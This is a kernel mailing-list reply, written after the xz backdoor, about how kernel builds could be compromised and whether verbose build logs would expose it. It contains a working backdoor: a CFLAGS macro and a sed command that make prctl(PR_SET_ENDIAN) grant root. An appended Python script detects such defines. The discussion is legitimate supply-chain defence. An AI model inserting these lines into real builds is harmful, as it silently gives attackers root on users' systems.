From: Michael Ellerman
To: Vegard Nossum, James Bottomley, "H. Peter Anvin", tech-board-discuss@lists.linuxfoundation.org
Cc: Theodore Ts'o
Subject: Re: xz meltdown/Lasse Collin
In-Reply-To: <872f9cfd-5c19-4a82-bf75-6256265e8f8a@oracle.com>
References: <8205E91D-F15B-402D-9398-33E4FF4E4E62@zytor.com> <030a96cf36719d8a7ec702b9303616f89daed4bb.camel@HansenPartnership.com> <872f9cfd-5c19-4a82-bf75-6256265e8f8a@oracle.com>
Date: Tue, 16 Apr 2024 16:24:56 +1000
Message-ID: <87zfttbz9j.fsf@mail.lhotse>
X-Mailing-List: tech-board-discuss@lists.linux.dev

Vegard Nossum writes:
> On 13/04/2024 15:16, James Bottomley wrote:
>> 2. We need better build artifact transparency generally but I think
>> the kernel is fine here: we still use make so don't have the huge
>> build artifact issue that allowed the exploit in and we have a
>> documented signing process for our build artifacts (kernel
>> tarballs).
>> 3. The indirect library dependency problem doesn't apply to us.
>
> While this is technically true, there are many other ways to compromise
> the kernel build process:
>
> 1) you can pass code in through the CFLAGS environment variable, one
> example that I came up with together with Michael Ellerman would be:
>
> -DSET_ENDIAN(x,y)=-22,commit_creds((void*)init_task.cred)
>
> when building kernel/sys.c on x86, this will turn any userspace call
> of prctl(PR_SET_ENDIAN), which normally just returns -EINVAL, into a
> backdoor quietly making the calling process root.
>
> All you need for an injection site is a preprocessor define that is
> conditionally set with #ifndef FOO/#define FOO.
>
> This does not appear in any source file or build output directly and so
> likely wouldn't get caught by SBOM-type solutions.

It would appear in the build log of a V=1 build. Someone would still need
to spot it, but at least there'd be a chance.
Debian kernels seem to use KBUILD_VERBOSE=1 by default. Judging from the
log (249MB!):

https://buildd.debian.org/status/fetch.php?pkg=linux&arch=amd64&ver=6.7.9-2&stamp=1710355583&raw=1

# CC kernel/sys.o
x86_64-linux-gnu-gcc-13 -Wp,-MMD,kernel/.sys.o.d -nostdinc -I/<>/arch/x86/include -I./arch/x86/include/generated -I/<>/include -I./include -I/<>/arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I/<>/include/uapi -I./include/generated/uapi -include /<>/include/linux/compiler-version.h -include /<>/include/linux/kconfig.h -include /<>/include/linux/compiler_types.h -D__KERNEL__ -fmacro-prefix-map=/<>/= -std=gnu11 -fshort-wchar -funsigned-char -fno-common -fno-PIE -fno-strict-aliasing -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=branch -fno-jump-tables -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fpatchable-function-entry=16,16 -fno-delete-null-pointer-checks -O2 -fno-allow-store-data-races -fstack-protector-strong -ftrivial-auto-var-init=zero -fno-stack-clash-protection -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -falign-functions=16 -fstrict-flex-arrays=3 -fno-strict-overflow -fno-stack-check -fconserve-stack -Wall -Wundef -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Werror=strict-prototypes -Wno-format-security -Wno-trigraphs -Wno-frame-address -Wno-address-of-packed-member -Wframe-larger-than=2048 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -Wno-dangling-pointer -Wvla -Wno-pointer-sign -Wcast-function-type -Wno-array-bounds -Wno-alloc-size-larger-than -Wimplicit-fallthrough=5 -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wenum-conversion -Wno-unused-but-set-variable -Wno-unused-const-variable -Wno-restrict -Wno-packed-not-aligned -Wno-format-overflow -Wno-format-truncation -Wno-stringop-overflow -Wno-stringop-truncation -Wno-missing-field-initializers -Wno-type-limits -Wno-shift-negative-value -Wno-maybe-uninitialized -Wno-sign-compare -g -fdebug-prefix-map=/<>/= -I /<>/kernel -I ./kernel -DKBUILD_MODFILE='"kernel/sys"' -DKBUILD_BASENAME='"sys"' -DKBUILD_MODNAME='"sys"' -D__KBUILD_MODNAME=kmod_sys -c -o kernel/sys.o /<>/kernel/sys.c

Though obviously that just motivates an attacker to inject their payload
via some other mechanism, e.g. by modifying the source earlier in the build:

$ sed -i -e "s/SET_ENDIAN(me, arg2)/-22;commit_creds((void*)init_task.cred)/" kernel/sys.c

On the other hand it looks like Fedora kernels are not built with V=1.
Just looking at the log (search for '-j48 bzImage'):

https://kojipkgs.fedoraproject.org//packages/kernel/6.8.5/301.fc40/data/logs/x86_64/build.log

cheers
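A defender-side check for the CFLAGS injection discussed in this thread, written as an added example (not code from the thread or from any kernel build tooling): it scans the compiler invocations of a V=1 build log for -D options whose macro name or value carries code instead of a plain identifier, number or quoted string. The log lines, compiler name and paths are constructed samples.

```python
import re
import shlex

# Constructed sample of a V=1 (KBUILD_VERBOSE=1) build log: the first
# compiler line is an ordinary kbuild invocation, the second carries the
# CFLAGS-injected macro from the thread. Paths are shortened placeholders.
SAMPLE_LOG = """\
  CC      kernel/fork.o
gcc -Wp,-MMD,kernel/.fork.o.d -D__KERNEL__ -DKBUILD_MODFILE='"kernel/fork"' -DKBUILD_BASENAME='"fork"' -DKBUILD_MODNAME='"fork"' -D__KBUILD_MODNAME=kmod_fork -c -o kernel/fork.o kernel/fork.c
  CC      kernel/sys.o
gcc -Wp,-MMD,kernel/.sys.o.d -D__KERNEL__ -DSET_ENDIAN(x,y)=-22,commit_creds((void*)init_task.cred) -DKBUILD_MODNAME='"sys"' -c -o kernel/sys.o kernel/sys.c
"""

# Legitimate kbuild defines are NAME or NAME=value, where the value is an
# identifier, a number or a double-quoted string (the shell-level single
# quotes are removed by shlex). A function-like macro name, or a value
# containing parentheses, commas or semicolons, is code and gets flagged.
MACRO_NAME = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
SAFE_VALUE = re.compile(r'^(?:[A-Za-z0-9_]+|"[^"]*")?$')


def suspicious_defines(log_text):
    """Return (object file, -D option) pairs for defines that look like code."""
    hits = []
    for line in log_text.splitlines():
        if " -c " not in line:  # only compiler invocations, not "  CC  foo.o"
            continue
        tokens = shlex.split(line)
        obj = tokens[tokens.index("-o") + 1] if "-o" in tokens else "?"
        for tok in tokens:
            if not tok.startswith("-D"):
                continue
            name, _, value = tok[2:].partition("=")
            if not MACRO_NAME.match(name) or not SAFE_VALUE.match(value):
                hits.append((obj, tok))
    return hits


if __name__ == "__main__":
    for obj, define in suspicious_defines(SAMPLE_LOG):
        print(f"{obj}: suspicious define {define}")
```

A source-level edit like the sed command above leaves the command line clean, so this check complements, rather than replaces, comparing the built source tree against the signed tarball or git tree.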